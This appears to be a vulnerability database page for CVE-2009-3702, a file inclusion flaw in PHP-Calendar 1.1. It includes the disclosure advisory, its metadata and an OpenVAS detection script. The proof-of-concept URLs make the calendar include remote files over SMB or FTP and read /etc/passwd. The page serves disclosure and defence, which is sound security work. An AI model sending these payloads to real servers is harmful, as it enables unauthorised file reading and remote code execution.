[ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability
2009-12-21T00:00:00
ID SECURITYVULNS:DOC:22976 Type securityvulns Reporter Securityvulns Modified 2009-12-21T00:00:00
Description
=============================================
INTERNET SECURITY AUDITORS ALERT 2009-011
- Original release date: October 13th, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- CVE ID: CVE-2009-3702
- Severity: 8.5/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
PHP-Calendar v1.1 'configfile' Remote and Local File Inclusion
vulnerability
II. BACKGROUND
PHP-Calendar is a simple web calendar. It is targeted towards groups
that need to collaboratively create and track events. In that same
collaborative spirit, the source for PHP-Calendar is available under
an open source license for anyone to use and modify.
III. DESCRIPTION
The 'configfile' variable is not properly filtered, and is possible to
include arbitrary remote and local files. This attack may lead to the
execution of arbitrary code.
The snippet of vulnerable code (part of update08.php and update10.php
file):
In order to include remote files, the value 'On' in the
allow_url_fopen directive is needed. There are two cases in which it
is possible remote code execution due to bypass the file_exists function:
1) If the victim server is running Windows operating system and there
is not a firewall filtering outgoing SMB requests, an attacker can use
an URL like //servername/path/to/file.php
2) If server is running PHP version > 5.0.0 (the most common) an
attacker can use FTP/FTPS protocol for inclusion. Like
ftp://servername/path/to/file.php See references for more information.
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
October 13, 2009: Initial release.
October 19, 2009: Added CVE id.
December 18, 2009: Last revision.
XI. DISCLOSURE TIMELINE
October 13, 2009: Vulnerability discovered by
Internet Security Auditors (www.isecauditors.com)
October 13, 2009: Sent to developers. No response.
December 13, 2009: Contact again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
XII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
{"id": "SECURITYVULNS:DOC:22976", "bulletinFamily": "software", "title": "[ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability", "description": "=============================================\r\nINTERNET SECURITY AUDITORS ALERT 2009-011\r\n- Original release date: October 13th, 2009\r\n- Last revised: December 18th, 2009\r\n- Discovered by: Juan Galiana Lara\r\n- CVE ID: CVE-2009-3702\r\n- Severity: 8.5/10 (CVSS Base Score)\r\n=============================================\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nPHP-Calendar v1.1 'configfile' Remote and Local File Inclusion\r\nvulnerability\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nPHP-Calendar is a simple web calendar. It is targeted towards groups\r\nthat need to collaboratively create and track events. In that same\r\ncollaborative spirit, the source for PHP-Calendar is available under\r\nan open source license for anyone to use and modify.\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nThe 'configfile' variable is not properly filtered, and is possible to\r\ninclude arbitrary remote and local files. This attack may lead to the\r\nexecution of arbitrary code.\r\n\r\nThe snippet of vulnerable code (part of update08.php and update10.php\r\nfile):\r\n\r\n 36 } elseif(!empty($_GET['configfile'])) {\r\n 37 if(file_exists($_GET['configfile'])) {\r\n 38 require_once($_GET['configfile']);\r\n\r\nIn order to include remote files, the value 'On' in the\r\nallow_url_fopen directive is needed. There are two cases in which it\r\nis possible remote code execution due to bypass the file_exists function:\r\n\r\n1) If the victim server is running Windows operating system and there\r\nis not a firewall filtering outgoing SMB requests, an attacker can use\r\nan URL like //servername/path/to/file.php\r\n2) If server is running PHP version > 5.0.0 (the most common) an\r\nattacker can use FTP/FTPS protocol for inclusion. Like\r\nftp://servername/path/to/file.php See references for more information.\r\n\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nFor including remote files:\r\n\r\nhttp://site/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php\r\nhttp://site/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php\r\nhttp://site/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php\r\nhttp://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php\r\n\r\nLocal files, this PoC will show the /etc/passwd file:\r\n\r\nhttp://site/php-calendar-1.1/update08.php?configfile=/etc/passwd\r\nhttp://site/php-calendar-1.1/update10.php?configfile=/etc/passwd\r\n\r\nV. BUSINESS IMPACT\r\n-------------------------\r\nUnauthenticated users can view any local file in the filesystem and\r\ncould execute arbitrary code remotely.\r\n\r\nVI. SYSTEMS AFFECTED\r\n-------------------------\r\nPHP-Calendar version 1.1 is vulnerable, others may be affected\r\n\r\nVII. SOLUTION\r\n-------------------------\r\nChange the code of update08.php (line 38) and update10.php (line 35)\r\nin order to filter $_GET['configfile'] variable.\r\n\r\nif (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile']))\r\nrequire_once($_GET['configfile']);\r\n\r\nIII. REFERENCES\r\n-------------------------\r\nhttp://www.php-calendar.com/\r\nhttp://www.php.net/manual/en/wrappers.ftp.php\r\nhttp://www.isecauditors.com/\r\n\r\nIX. CREDITS\r\n-------------------------\r\nThis vulnerability has been discovered by\r\nJuan Galiana Lara (jgaliana (at) isecauditors (dot) com).\r\n\r\nX. REVISION HISTORY\r\n-------------------------\r\nOctober 13, 2009: Initial release.\r\nOctober 19, 2009: Added CVE id.\r\nDecember 18, 2009: Last revision.\r\n\r\nXI. DISCLOSURE TIMELINE\r\n-------------------------\r\nOctober 13, 2009: Vulnerability discovered by\r\n Internet Security Auditors (www.isecauditors.com)\r\nOctober 13, 2009: Sent to developers. No response.\r\nDecember 13, 2009: Contact again. No response.\r\nDecember 18, 2009: Added mitigation solution and sent to lists.\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\nThe information contained within this advisory is supplied "as-is"\r\nwith no warranties or guarantees of fitness of use or otherwise.\r\nInternet Security Auditors accepts no responsibility for any damage\r\ncaused by the use or misuse of this information.", "published": "2009-12-21T00:00:00", "modified": "2009-12-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22976", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2009-3702"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:32", "edition": 1, "viewCount": 38, "enchantments": {"score": {"value": 6.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-3702"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310901090"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84064"]}]}, "exploitation": null, "vulnersScore": 6.7}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645452243}}
{"cve": [{"lastseen": "2022-03-23T21:35:53", "description": "Multiple absolute path traversal vulnerabilities in PHP-Calendar 1.1 allow remote attackers to include and execute arbitrary local files via a full pathname in the configfile parameter to (1) update08.php or (2) update10.php. NOTE: in some environments, this can be leveraged for remote file inclusion by using a UNC share pathname or an ftp, ftps, or ssh2.sftp URL.", "cvss3": {}, "published": "2009-12-22T19:30:00", "type": "cve", "title": "CVE-2009-3702", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3702"], "modified": "2018-10-10T19:47:00", "cpe": ["cpe:/a:php-calendar:php-calendar:1.1"], "id": "CVE-2009-3702", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3702", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php-calendar:php-calendar:1.1:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T18:34:24", "description": "CVE(CAN) ID: CVE-2009-3702\r\n\r\nphp-Calendar\u662f\u4e00\u6b3e\u57fa\u4e8eWEB\u7684\u65e5\u5386\u4e8b\u52a1\u7cfb\u7edf\u3002\r\n\r\nPHP-Calendar\u4e2d\u5b58\u5728\u591a\u4e2a\u7edd\u5bf9\u8def\u5f84\u904d\u5386\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5728\u63d0\u4ea4\u7ed9update08.php\u6216update10.ph\u7684configfile\u53c2\u6570\u4e2d\u7684\u5b8c\u6574\u8def\u5f84\u540d\u5bfc\u81f4\u5305\u542b\u5e76\u6267\u884c\u4efb\u610f\u672c\u5730\u6587\u4ef6\u3002\u4ee5\u4e0b\u662f\u6709\u6f0f\u6d1e\u7684\u4ee3\u7801\u6bb5\uff1a\r\n\r\n 36 } elseif(!empty($_GET['configfile'])) {\r\n 37 if(file_exists($_GET['configfile'])) {\r\n 38 require_once($_GET['configfile']);\n\nPHP-Calendar 1.1\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u66f4\u6539update08.php\uff0838\u884c\uff09\u548cupdate10.php\uff0835\u884c\uff09\u4e2d\u4ee3\u7801\u8fc7\u6ee4$_GET['configfile']\u53d8\u91cf\uff1a\r\n\r\nif (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile']))\r\nrequire_once($_GET['configfile']);\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP-Calendar\r\n------------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://php-calendar.sourceforge.net/", "cvss3": {}, "published": "2009-12-25T00:00:00", "title": "PHP-Calendar configfile\u53d8\u91cf\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3702"], "modified": "2009-12-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15140", "id": "SSV:15140", "sourceData": "\n http://site/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php\r\nhttp://site/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php\r\nhttp://site/php-calendar-1.1/update10.php?configfile=\\\\ip\\path\\to\\file.php\r\nhttp://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php\r\nhttp://site/php-calendar-1.1/update08.php?configfile=/etc/passwd\r\nhttp://site/php-calendar-1.1/update10.php?configfile=/etc/passwd\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15140", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:13", "description": "", "cvss3": {}, "published": "2009-12-18T00:00:00", "type": "packetstorm", "title": "PHP-Calendar 1.1 Remote/Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3702"], "modified": "2009-12-18T00:00:00", "id": "PACKETSTORM:84064", "href": "https://packetstormsecurity.com/files/84064/PHP-Calendar-1.1-Remote-Local-File-Inclusion.html", "sourceData": "`============================================= \nINTERNET SECURITY AUDITORS ALERT 2009-011 \n- Original release date: October 13th, 2009 \n- Last revised: December 18th, 2009 \n- Discovered by: Juan Galiana Lara \n- CVE ID: CVE-2009-3702 \n- Severity: 8.5/10 (CVSS Base Score) \n============================================= \n \nI. VULNERABILITY \n------------------------- \nPHP-Calendar v1.1 'configfile' Remote and Local File Inclusion \nvulnerability \n \nII. BACKGROUND \n------------------------- \nPHP-Calendar is a simple web calendar. It is targeted towards groups \nthat need to collaboratively create and track events. In that same \ncollaborative spirit, the source for PHP-Calendar is available under \nan open source license for anyone to use and modify. \n \nIII. DESCRIPTION \n------------------------- \nThe 'configfile' variable is not properly filtered, and is possible to \ninclude arbitrary remote and local files. This attack may lead to the \nexecution of arbitrary code. \n \nThe snippet of vulnerable code (part of update08.php and update10.php \nfile): \n \n36 } elseif(!empty($_GET['configfile'])) { \n37 if(file_exists($_GET['configfile'])) { \n38 require_once($_GET['configfile']); \n \nIn order to include remote files, the value 'On' in the \nallow_url_fopen directive is needed. There are two cases in which it \nis possible remote code execution due to bypass the file_exists function: \n \n1) If the victim server is running Windows operating system and there \nis not a firewall filtering outgoing SMB requests, an attacker can use \nan URL like //servername/path/to/file.php \n2) If server is running PHP version > 5.0.0 (the most common) an \nattacker can use FTP/FTPS protocol for inclusion. Like \nftp://servername/path/to/file.php See references for more information. \n \nIV. PROOF OF CONCEPT \n------------------------- \nFor including remote files: \n \nhttp://site/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php \nhttp://site/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php \nhttp://site/php-calendar-1.1/update10.php?configfile=\\\\ip\\path\\to\\file.php \nhttp://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php \n \nLocal files, this PoC will show the /etc/passwd file: \n \nhttp://site/php-calendar-1.1/update08.php?configfile=/etc/passwd \nhttp://site/php-calendar-1.1/update10.php?configfile=/etc/passwd \n \nV. BUSINESS IMPACT \n------------------------- \nUnauthenticated users can view any local file in the filesystem and \ncould execute arbitrary code remotely. \n \nVI. SYSTEMS AFFECTED \n------------------------- \nPHP-Calendar version 1.1 is vulnerable, others may be affected \n \nVII. SOLUTION \n------------------------- \nChange the code of update08.php (line 38) and update10.php (line 35) \nin order to filter $_GET['configfile'] variable. \n \nif (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile'])) \nrequire_once($_GET['configfile']); \n \nIII. REFERENCES \n------------------------- \nhttp://www.php-calendar.com/ \nhttp://www.php.net/manual/en/wrappers.ftp.php \nhttp://www.isecauditors.com/ \n \nIX. CREDITS \n------------------------- \nThis vulnerability has been discovered by \nJuan Galiana Lara (jgaliana (at) isecauditors (dot) com). \n \nX. REVISION HISTORY \n------------------------- \nOctober 13, 2009: Initial release. \nOctober 19, 2009: Added CVE id. \nDecember 18, 2009: Last revision. \n \nXI. DISCLOSURE TIMELINE \n------------------------- \nOctober 13, 2009: Vulnerability discovered by \nInternet Security Auditors (www.isecauditors.com) \nOctober 13, 2009: Sent to developers. No response. \nDecember 13, 2009: Contact again. No response. \nDecember 18, 2009: Added mitigation solution and sent to lists. \n \nXII. LEGAL NOTICES \n------------------------- \nThe information contained within this advisory is supplied \"as-is\" \nwith no warranties or guarantees of fitness of use or otherwise. \nInternet Security Auditors accepts no responsibility for any damage \ncaused by the use or misuse of this information. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/84064/phpcalendar-rfilfi.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-12T17:33:26", "description": "This host is running PHP-Calendar and is prone to Remote And Local\n File Inclusion vulnerability.", "cvss3": {}, "published": "2009-12-31T00:00:00", "type": "openvas", "title": "PHP-Calendar Multiple Remote And Local File Inclusion Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-3702"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310901090", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901090", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PHP-Calendar Multiple Remote And Local File Inclusion Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php-calendar:php-calendar\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901090\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-12-31 08:44:14 +0100 (Thu, 31 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-3702\");\n script_bugtraq_id(37450);\n script_name(\"PHP-Calendar Multiple Remote And Local File Inclusion Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_php_calendar_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"PHP-Calendar/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/508548/100/0/threaded\");\n\n script_tag(name:\"affected\", value:\"PHP-Calendar version 1.1 and prior on all platforms.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to error in 'configfile' parameter in 'update08.php' and\n 'update10.php' which is not properly verified before being used to include files.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP-Calendar version 1.4 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running PHP-Calendar and is prone to Remote And Local\n File Inclusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to include and execute arbitrary\n files from local and external resources, and can gain sensitive information\n about remote system directories when register_globals is enabled.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_xref(name:\"URL\", value:\"http://www.cascade.org.uk/software/php/calendar/\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nfiles = traversal_files();\nvulnfiles = make_list( \"/update08.php\", \"/update10.php\" );\n\nforeach file( keys( files ) ) {\n\n foreach vulnfile( vulnfiles ) {\n\n url = dir + vulnfile + \"?configfile=/\" + files[file];\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T18:53:47", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2009-12-21T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-4261", "CVE-2009-3702"], "modified": "2009-12-21T00:00:00", "id": "SECURITYVULNS:VULN:10485", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10485", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
